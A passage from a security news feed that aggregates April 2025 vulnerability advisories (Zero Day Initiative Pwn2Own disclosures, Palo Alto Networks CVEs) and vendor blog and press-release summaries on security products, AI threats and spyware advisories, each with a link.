2025-04-10T05:00:00Z | 1744261200

A CVSS score 5.7 AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N severity vulnerability discovered by 'Alfredo Oliveira and David Fiser of Trend Research' was reported to the affected vendor on: 2025-04-10, 57 days ago. The vendor is given until 2025-08-08 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Tenable Empowers erex with Continuous Cybersecurity Protection, Eliminating Costly Outsourcing
2025-04-10T01:00:00Z | 1744246800

Tenable®, Inc., the exposure management company, today announced that erex Co., Ltd, a pioneer in renewable energy, has selected Tenable One to visualize risks beyond vulnerabilities, including misconfigurations, entitlement flaws, software weaknesses with confidence and maintain an environment ready to defend against cyberattacks.Previously, the company relied on third-party cybersecurity specialists to detect whether the latest security patches were in place and find misconfigurations of its externally facing websites. While these assessments were comprehensive and detailed, they were costly, time-consuming, and limited to major website overhauls."With Tenable One, we now have the ability to unify security visibility, insight and action across the attack surface to understand our risk exposure and prioritize remediation efforts. This enhances our security posture and allows us to respond to threats proactively," said Mr. Ashish Gupta, Information System Department, erex Co., Ltd.erex now has the technical and business context to distinguish which risk combinations constitute true exposure from a sea of noisy findings. The result is greater productivity from security teams and the ability to quickly generate summary reports that highlight critical and high-level issues for internal distribution."Visibility and proactive security are critical for managing risk," said Naoya Kishima, Country Manager at Tenable Japan. "We are proud to support erex in strengthening its cybersecurity defenses with Tenable One. By providing continuous threat exposure management (CTEM), Tenable One enables organizations to detect vulnerabilities in real-time and take decisive action before threats materialise."For more information, please refer to the full case study here.About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com.###Media Contact:Tenabletenablepr@tenable.com

https://www.tenable.com/press-releases/tenable-empowers-erex-with-continuous-cybersecurity-protection-eliminating-costly
iSource 2.0R13: The Next Leap in Unified Security Operations
2025-04-10T00:57:15Z | 1744246635

Whether you’re dealing with fragmented security tools, struggling with incident investigations, or securing a multi-cloud environment, iSource 2.0R13 is packed with powerful enhancements to streamline security operations, improve threat detection, and simplify cloud security. Open Architecture for Heterogeneous Data From Multiple Vendors Modern enterprises use security tools from multiple vendors—firewalls, EDR, SIEM, cloud security, and […] The post iSource 2.0R13: The Next Leap in Unified Security Operations appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/isource-2-0r13-the-next-leap-in-unified-security-operations/
SOCI Act: Strengthening Australia’s Critical Infrastructure Security
2025-04-09T23:00:00Z | 1744239600

Cyber threats are becoming increasingly sophisticated and frequent, and the protection of critical infrastructure has never been more important. Australia... The post SOCI Act: Strengthening Australia’s Critical Infrastructure Security  first appeared on Dragos.

https://www.dragos.com/blog/soci-act-strengthening-australias-critical-infrastructure-security/
How to request a change to a CVE record
2025-04-09T20:02:44Z | 1744228964

Learn how to identify which CVE Numbering Authority is responsible for the record, how to contact them, and what to include with your suggestion. The post How to request a change to a CVE record appeared first on The GitHub Blog.

https://github.blog/security/vulnerability-research/how-to-request-a-change-to-a-cve-record/
CVE-2025-0128 PAN-OS: Firewall Denial of Service (DoS) Using a Specially Crafted Packet (Severity: MEDIUM)
2025-04-09T16:00:00Z | 1744214400

CVE-2025-0128 PAN-OS: Firewall Denial of Service (DoS) Using a Specially Crafted Packet (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2025-0128
CVE-2025-0119 Cortex XDR Broker VM: Authenticated Command Injection Vulnerability in Broker VM (Severity: LOW)
2025-04-09T16:00:00Z | 1744214400

CVE-2025-0119 Cortex XDR Broker VM: Authenticated Command Injection Vulnerability in Broker VM (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0119
CVE-2025-0126 PAN-OS: Session Fixation Vulnerability in GlobalProtect SAML Login (Severity: MEDIUM)
2025-04-09T16:00:00Z | 1744214400

CVE-2025-0126 PAN-OS: Session Fixation Vulnerability in GlobalProtect SAML Login (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2025-0126
CVE-2025-0124 PAN-OS: Authenticated File Deletion Vulnerability on the Management Web Interface (Severity: LOW)
2025-04-09T16:00:00Z | 1744214400

CVE-2025-0124 PAN-OS: Authenticated File Deletion Vulnerability on the Management Web Interface (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2025-0124
PAN-SA-2025-0008 Chromium and Prisma Access Browser: Monthly Vulnerability Update (April 2025) (Severity: HIGH)
2025-04-09T16:00:00Z | 1744214400

PAN-SA-2025-0008 Chromium and Prisma Access Browser: Monthly Vulnerability Update (April 2025) (Severity: HIGH)

https://security.paloaltonetworks.com/PAN-SA-2025-0008
HYAS Insight: Power Up Your SIEM with Infrastructure Intelligence for Cyber Resiliency
2025-04-09T15:20:03Z | 1744212003

Your SIEM is the heartbeat of your SOC. It collects logs, surfaces alerts, and helps your team respond to potential threats in real time. But even the most advanced SIEM can only go so far without the right intelligence to fuel it. If you’re relying on traditional IOCs and static threat feeds, you’re missing out on the deeper context that turns alerts into answers. This is where HYAS Insight changes the game. By feeding Infrastructure Intelligence into your SIEM, HYAS Insight adds critical layers of context that go beyond basic indicators. It helps your team understand the infrastructure behind cyberattacks—how domains, IPs, malware samples, and WHOIS records are all connected. And when you can see how attackers operate at the infrastructure level, you don’t just respond to threats faster—you start anticipating them.This is the path to cyber resiliency, and it begins with integrating the right data into the tools you already use. Why Infrastructure Intelligence Matters for SIEM To learn more about the foundational concept behind this blog, check out our related post: What is Infrastructure Intelligence? Most SIEMs do a solid job of collecting and correlating logs. They alert you when something anomalous happens—an unusual login attempt, suspicious DNS traffic, or a connection to a known bad domain. But too often, that’s where the story ends. Without deeper insight into why the alert matters or how it fits into a broader campaign, analysts are left guessing. Infrastructure Intelligence fills that gap. Rather than looking at isolated indicators, Infrastructure Intelligence maps the relationships between attacker-controlled assets—like how domains are registered, which IPs host them, what malware they’re linked to, and how that infrastructure is reused across campaigns. When integrated into your SIEM, Infrastructure Intelligence enables your team to: Enrich alerts with adversary infrastructure context Spot new threats based on behavioral patterns, not just known indicators Correlate seemingly unrelated events into a cohesive threat narrative Accelerate investigation and incident response Move from reactive defense to proactive detection and threat hunting What HYAS Insight Adds to Your SIEM HYAS Insight delivers Infrastructure Intelligence at scale, directly into your workflows. Here’s how it enhances your SIEM: WHOIS & Domain Registration Data Identify patterns in domain registration that reveal attacker behavior. HYAS Insight surfaces registrant emails, nameservers, and infrastructure reused across campaigns—details most SIEMs can’t detect on their own. Passive DNS See how domains and IPs have historically resolved. HYAS Insight provides visibility into changes and resolution patterns that indicate evolving attacker infrastructure—ideal for enriching DNS alerts. Dynamic DNS Tracking HYAS Insight identifies DDNS services often used by attackers for agile, resilient infrastructure. This context elevates otherwise benign alerts. C2 Infrastructure & Malware Associations HYAS maps domains and IPs to known malware and active C2 servers, helping your SOC prioritize and escalate alerts tied to real adversary infrastructure. Infrastructure Correlation and Pivoting Pivot from a single IOC to a broader view of the adversary’s infrastructure. From one SIEM alert, uncover linked domains, IPs, and malware associated with ongoing campaigns. Real-World Impact: From Alert to Attribution Imagine your SIEM flags a DNS query to a previously unseen domain. There’s no known reputation or obvious threat. But with HYAS Insight: Passive DNS reveals resolution to an IP tied to past malicious activity. WHOIS links the domain to a registrant used in prior phishing infrastructure. The domain overlaps with malware samples in HYAS Insight’s dataset, connecting it to an active credential theft campaign. This context transforms a simple alert into an informed, confident response. Investigations become faster, more complete, and actionable—because your team understands the threat’s scope and intent. Infrastructure Intelligence: A Cornerstone of Cyber Resiliency Improving your SIEM is about more than speeding up investigations—it’s about building cyber resiliency across your organization. Cyber resiliency means withstanding, adapting to, and recovering from attacks—not just preventing them. It requires deep visibility into attacker infrastructure and behaviors. HYAS Insight supports this resiliency by helping your team: Anticipate threats through infrastructure trend analysis Withstand attacks by understanding infrastructure dependencies Recover quickly with full knowledge of attacker assets Adapt intelligently by tracking attacker behavior over time Combined with other tools like HYAS Protect, Protective DNS, HYAS Insight is a force multiplier for proactive, resilient cybersecurity. Learn more in our blog: Achieving Cyber Resiliency With Protective DNS How to Integrate HYAS Insight Into Your SIEM Integrating HYAS Insight is straightforward. Flexible options include: API-based enrichment: Automatically pull context into SIEM alerts. SOAR workflows: Use Insight data in playbooks to triage alerts. Manual pivoting: Link from SIEM to HYAS Insight UI for deeper analysis. Scheduled correlation: Run regular scans for new matches in your logs. Even basic integration yields substantial value. When your SIEM sees more, your security team acts faster—with greater accuracy. Turn Your SIEM into a Resilient Threat Intelligence Engine HYAS Insight is more than a data feed—it’s Infrastructure Intelligence designed to elevate your security operations. By integrating Infrastructure Intelligence into your SIEM, you: Gain deep context behind every alert Investigate threats with speed and clarity Move from reactive defense to proactive detection Build a cyber-resilient organization Ready to see HYAS Insight in action? Schedule a demo and discover how it can supercharge your SIEM. What is HYAS Insight? HYAS is the world’s premier provider of infrastructure intelligence, enabling organizations worldwide with unparalleled visibility, protection, and the necessary proactive intelligence to address cyber attacks, fraud, and all forms of digital risk. With real-time visibility into adversary infrastructure and their related devices, HYAS Insight allows security teams to track, monitor, and dismantle cyber threats and fraud with unmatched speed and precision. Learn more at hyas.com

https://www.hyas.com/blog/hyas-insight-power-up-your-siem-with-infrastructure-intelligence-for-cyber-resiliency
AkiraBot | AI-Powered Bot Bypasses CAPTCHAs, Spams Websites At Scale
2025-04-09T15:00:36Z | 1744210836

AkiraBot uses OpenAI to generate custom outreach messages to spam chat widgets and website contact forms at scale.

https://www.sentinelone.com/labs/akirabot-ai-powered-bot-bypasses-captchas-spams-websites-at-scale/
Joint guidance on BADBAZAAR and MOONSHINE
2025-04-09T13:09:09Z | 1744204149

https://cyber.gc.ca/en/news-events/joint-guidance-badbazaar-moonshine
How Prompt Attacks Exploit GenAI and How to Fight Back
2025-04-09T13:00:58Z | 1744203658

GenAI boosts productivity but also poses security risks. Palo Alto Networks has a new whitepaper about prompt-based threats and how to defend against them. The post How Prompt Attacks Exploit GenAI and How to Fight Back appeared first on Unit 42.

https://unit42.paloaltonetworks.com/new-frontier-of-genai-threats-a-comprehensive-guide-to-prompt-attacks/
Introducing a new section on snapshot fuzzing for kernel-level testing in the Testing Handbook
2025-04-09T13:00:00Z | 1744203600

Snapshot Fuzzing enables security engineers to effectively test software that is traditionally difficult to analyze, such as kernels, secure monitors, and other complex targets that require non-trivial setup. Whether you’re auditing drivers or other kernel-mode components, including antivirus software, snapshot fuzzing provides a robust way to discover critical vulnerabilities. Consult our new Testing Handbook section for a walkthrough on how to conduct snapshot fuzzing on your system.

https://blog.trailofbits.com/2025/04/09/introducing-a-new-section-on-snapshot-fuzzing-for-kernel-level-testing-in-the-testing-handbook/
DDoS: The Next Generation
2025-04-09T13:00:00Z | 1744203600

Geopolitical conflict continues to drive up the number of distributed denial-of-service (DDoS) attacks, with spikes of up to 1,900 percent in certain areas correlating with political events. Artificial intelligence/machine learning (Al/ML), automation, and the abuse of enterprise-grade infrastructure are making attacks...

https://www.netscout.com/blog/ddos-next-generation
The Rising Tide of Privacy Risks
2025-04-09T12:00:00Z | 1744200000

In 2025, data is both a valuable asset and a significant liability. With privacy regulations tightening worldwide and consumer expectations at an all-time high, businesses must take privacy risk management seriously - or face the consequences. From consequential fines to reputational damage, the risks of mishandling privacy are growing. But how can organizations stay ahead in an increasingly complex privacy landscape?

https://blog.riskrecon.com/the-rising-tide-of-privacy-risks
PTaaS for Mobile Apps: The Scalable Alternative to Traditional Penetration Testing
2025-04-09T11:30:00Z | 1744198200

Traditional penetration testing wasn’t built for today’s mobile release cycles. Annual, semi-annual or even quarterly pen tests don’t cut it anymore. If your mobile app updates weekly, that’s a dozen untested versions before your next scheduled assessment. That’s a dozen chances for a data leak or privacy flaw to slip through. Mobile Penetration Testing as […] The post PTaaS for Mobile Apps: The Scalable Alternative to Traditional Penetration Testing appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/04/09/ptaas-for-mobile-apps-the-scalable-alternative-to-traditional-penetration-testing/
Consistent Security Everywhere: Akamai Makes Leading WAF Technology CDN-Agnostic
2025-04-09T10:00:00Z | 1744192800

https://www.akamai.com/blog/security/2025/apr/akamai-makes-leading-waf-technology-cdn-agnostic
The Search Analytics API now supports hourly data
2025-04-09T10:00:00Z | 1744192800

A few months ago, we announced an improved way to view recent performance data in Search Console. The "24 hours" view includes data from the last available 24 hours and appears with a delay of only a few hours. This view can help you find information about which pages and queries are performing in this recent timeframe and how content you recently published is picking up.

https://developers.google.com/search/blog/2025/04/san-hourly-data
Data Poisoning: The Hidden Threat That Could Kill Your AI
2025-04-09T09:15:10Z | 1744190110

AI is only as good as the data it learns from, and attackers are already exploiting that fact. Data poisoning is quickly becoming one of the most dangerous and least understood cyber threats facing organizations. While your security team focuses on perimeter defenses, attackers are poisoning the data your AI relies on – without ever needing to break into your systems. But what Is Data Poisoning? And Why Should You Care? The post Data Poisoning: The Hidden Threat That Could Kill Your AI appeared first on Certes.

https://certes.ai/2025/04/09/data-poisoning-threat-kill-ai/
Say Goodbye to SaaS Security Gaps with Cato CASB
2025-04-09T09:06:08Z | 1744189568

Introduction  As organizations increasingly depend on SaaS applications, IT teams struggle with visibility and governance. Shadow IT, unmanaged devices, and limited monitoring capabilities create blind spots, exposing enterprises to compliance violations, data exfiltration, and insider threats. Risks don’t come only from unsanctioned applications: even widely used SaaS platforms can become a security liability when not... The post Say Goodbye to SaaS Security Gaps with Cato CASB  appeared first on Cato Networks.

https://www.catonetworks.com/blog/say-goodbye-to-saas-security-gaps-with-cato-casb/
So your friend has been hacked: Could you be next?
2025-04-09T09:00:00Z | 1744189200

When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.

https://www.welivesecurity.com/en/cybersecurity/so-your-friend-has-been-hacked-could-you-be-next/
The Hidden Threat Within: How BYOAI Challenges Enterprise AI Security
2025-04-09T08:25:01Z | 1744187101

Generative AI is no longer confined to R&D labs or experimental projects… it’s permeating every department of every organization. Employees across the enterprise, from cybersecurity analysts writing detection rules to HR professionals crafting internal communications, increasingly bring their own AI tools (BYOAI) to boost productivity, fill resource gaps, and drive innovation. However, alongside these productivity […] The post The Hidden Threat Within: How BYOAI Challenges Enterprise AI Security appeared first on CounterCraft.

https://www.countercraftsec.com/blog/byoai-challenging-enterprise-cybersecurity-ai-security/
BADBAZAAR and MOONSHINE: Spyware targeting Uyghur, Taiwanese and Tibetan groups and civil society actors
2025-04-09T07:53:28Z | 1744185208

The NCSC and partners publish new information and mitigation measures for those at high risk from two spyware variants.

https://www.ncsc.gov.uk/news/advisory-badbazaar-moonshine
Riasztás Microsoft termékeket érintő sérülékenységekről – 2025. április
2025-04-09T07:39:01Z | 1744184341

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2025-aprilis/
ZDI-CAN-26916: MLflow
2025-04-09T05:00:00Z | 1744174800

A CVSS score 8.1 AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-09, 58 days ago. The vendor is given until 2025-08-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26925: Autodesk
2025-04-09T05:00:00Z | 1744174800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-09, 58 days ago. The vendor is given until 2025-08-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26922: Autodesk
2025-04-09T05:00:00Z | 1744174800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-09, 58 days ago. The vendor is given until 2025-08-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26917: Autodesk
2025-04-09T05:00:00Z | 1744174800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-09, 58 days ago. The vendor is given until 2025-08-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26923: Autodesk
2025-04-09T05:00:00Z | 1744174800

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-09, 58 days ago. The vendor is given until 2025-08-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-207: (Pwn2Own) Synology BeeStation BST150-4T Command Injection Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology BeeStation BST150-4T devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-10443.

http://www.zerodayinitiative.com/advisories/ZDI-25-207/
ZDI-25-208: (Pwn2Own) Synology DiskStation DS1823xs+ Replication Service Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation DS1823xs+ devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-10442.

http://www.zerodayinitiative.com/advisories/ZDI-25-208/
ZDI-25-209: (Pwn2Own) Synology BeeStation BST150-4T Cleartext Transmission of Sensitive Information Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to spoof specific configuration values on affected installations of Synology BeeStation BST150-4T devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2024-10445.

http://www.zerodayinitiative.com/advisories/ZDI-25-209/
ZDI-25-210: (Pwn2Own) Synology BeeStation BST150-4T Improper Input Validation Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology BeeStation BST150-4T devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-10445.

http://www.zerodayinitiative.com/advisories/ZDI-25-210/
ZDI-25-211: (Pwn2Own) Synology BeeStation BST150-4T CRLF Injection Information Disclosure Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Synology BeeStation BST150-4T devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2024-50629.

http://www.zerodayinitiative.com/advisories/ZDI-25-211/
ZDI-25-212: (Pwn2Own) Synology BeeStation BST150-4T Improper Authentication Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Synology BeeStation BST150-4T devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-50630.

http://www.zerodayinitiative.com/advisories/ZDI-25-212/
ZDI-25-213: (Pwn2Own) Synology BeeStation BST150-4T SQL Injection Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology BeeStation BST150-4T devices. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.4. The following CVEs are assigned: CVE-2024-50631.

http://www.zerodayinitiative.com/advisories/ZDI-25-213/
ZDI-25-214: (Pwn2Own) Synology DiskStation DS1823xs+ Vue.JS Improper Neutralization of Argument Delimiters Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation DS1823xs+ devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-10441.

http://www.zerodayinitiative.com/advisories/ZDI-25-214/
ZDI-25-215: (Pwn2Own) Synology DiskStation DS1823xs+ LDAP Client Improper Certificate Validation Authentication Bypass Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Synology DiskStation DS1823xs+ devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-10444.

http://www.zerodayinitiative.com/advisories/ZDI-25-215/
ZDI-25-216: (Pwn2Own) Synology TC500 ONVIF Heap-based Buffer Overflow Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology TC500 cameras. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-11131.

http://www.zerodayinitiative.com/advisories/ZDI-25-216/
ZDI-25-217: (Pwn2Own) Lexmark CX331adwe loadCFFdata Type Confusion Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Lexmark CX331adwe printers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-11344.

http://www.zerodayinitiative.com/advisories/ZDI-25-217/
ZDI-25-218: (Pwn2Own) Lexmark CX331adwe JPEG2000 Memory Corruption Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Lexmark CX331adwe printers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-11345.

http://www.zerodayinitiative.com/advisories/ZDI-25-218/
ZDI-25-219: (Pwn2Own) Lexmark CX331adwe JBIG2 File Parsing new_image Integer Overflow Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Lexmark CX331adwe printers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-11347.

http://www.zerodayinitiative.com/advisories/ZDI-25-219/
ZDI-25-220: (Pwn2Own) Lexmark CX331adwe basic_auth.cgi PATH_TRANSLATED Directory Traversal Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Lexmark CX331adwe printers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.3.

http://www.zerodayinitiative.com/advisories/ZDI-25-220/
ZDI-25-221: (Pwn2Own) Lexmark CX331adwe httpd extract-trace Link Following Local Privilege Escalation Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows local attackers to escalate privileges on affected installations of Lexmark CX331adwe printers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.0.

http://www.zerodayinitiative.com/advisories/ZDI-25-221/
ZDI-25-222: (Pwn2Own) Lexmark CX331adwe concatstrings Type Confusion Information Disclosure Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Lexmark CX331adwe printers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2024-11346.

http://www.zerodayinitiative.com/advisories/ZDI-25-222/
ZDI-25-223: (Pwn2Own) Sonos Era 300 Speaker libsmb2 Use-After-Free Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Sonos Era 300 speakers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-1048.

http://www.zerodayinitiative.com/advisories/ZDI-25-223/
ZDI-25-224: (Pwn2Own) Sonos Era 300 Heap-based Buffer Overflow Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected Sonos Era 300 speakers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-1049.

http://www.zerodayinitiative.com/advisories/ZDI-25-224/
ZDI-25-225: (Pwn2Own) Sonos Era 300 Out-of-Bounds Write Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected Sonos Era 300 speakers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-1050.

http://www.zerodayinitiative.com/advisories/ZDI-25-225/
ZDI-25-226: (Pwn2Own) Samsung Galaxy S24 Gaming Hub Improper Input Validation Privilege Escalation Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to escalate privileges on affected installations of Samsung Galaxy S24 smartphones. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 5.4. The following CVEs are assigned: CVE-2024-49419, CVE-2024-49418.

http://www.zerodayinitiative.com/advisories/ZDI-25-226/
ZDI-25-227: (Pwn2Own) Samsung Galaxy S24 Gaming Hub Exposed Dangerous Method Local Privilege Escalation Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows local attackers to escalate privileges on affected installations of Samsung Galaxy S24. An attacker must first obtain the ability to execute low-privileged script on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2024-49420.

http://www.zerodayinitiative.com/advisories/ZDI-25-227/
ZDI-25-228: (Pwn2Own) Samsung Galaxy S24 Quick Share Insufficient UI Warning Arbitrary File Write Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to create arbitrary files on affected installations of Samsung Galaxy S24. An attacker must first obtain the ability to perform activities on the target device. The ZDI has assigned a CVSS rating of 5.3.

http://www.zerodayinitiative.com/advisories/ZDI-25-228/
ZDI-25-229: (Pwn2Own) Samsung Galaxy S24 Quick Share Directory Traversal Arbitrary File Write Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to create arbitrary files on affected installations of Samsung Galaxy S24. An attacker must first obtain the ability to perform activities on the target device. The ZDI has assigned a CVSS rating of 5.9. The following CVEs are assigned: CVE-2024-49421.

http://www.zerodayinitiative.com/advisories/ZDI-25-229/
ZDI-25-230: (Pwn2Own) Samsung Galaxy S24 Smart Switch Agent Improper Verification of Cryptographic Signature Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Samsung Galaxy S24. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-49413.

http://www.zerodayinitiative.com/advisories/ZDI-25-230/
ZDI-25-231: Luxion KeyShot SKP File Parsing Use-After-Free Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1046.

http://www.zerodayinitiative.com/advisories/ZDI-25-231/
ZDI-25-232: Luxion KeyShot PVS File Parsing Access of Uninitialized Pointer Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1047.

http://www.zerodayinitiative.com/advisories/ZDI-25-232/
ZDI-25-233: Luxion KeyShot Viewer KSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-1045.

http://www.zerodayinitiative.com/advisories/ZDI-25-233/
ZDI-25-234: Microsoft Windows dxkrnl Untrusted Pointer Dereference Local Privilege Escalation Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-29812.

http://www.zerodayinitiative.com/advisories/ZDI-25-234/
ZDI-25-235: Ivanti Endpoint Manager OpenRecordSet SQL Injection Remote Code Execution Vulnerability
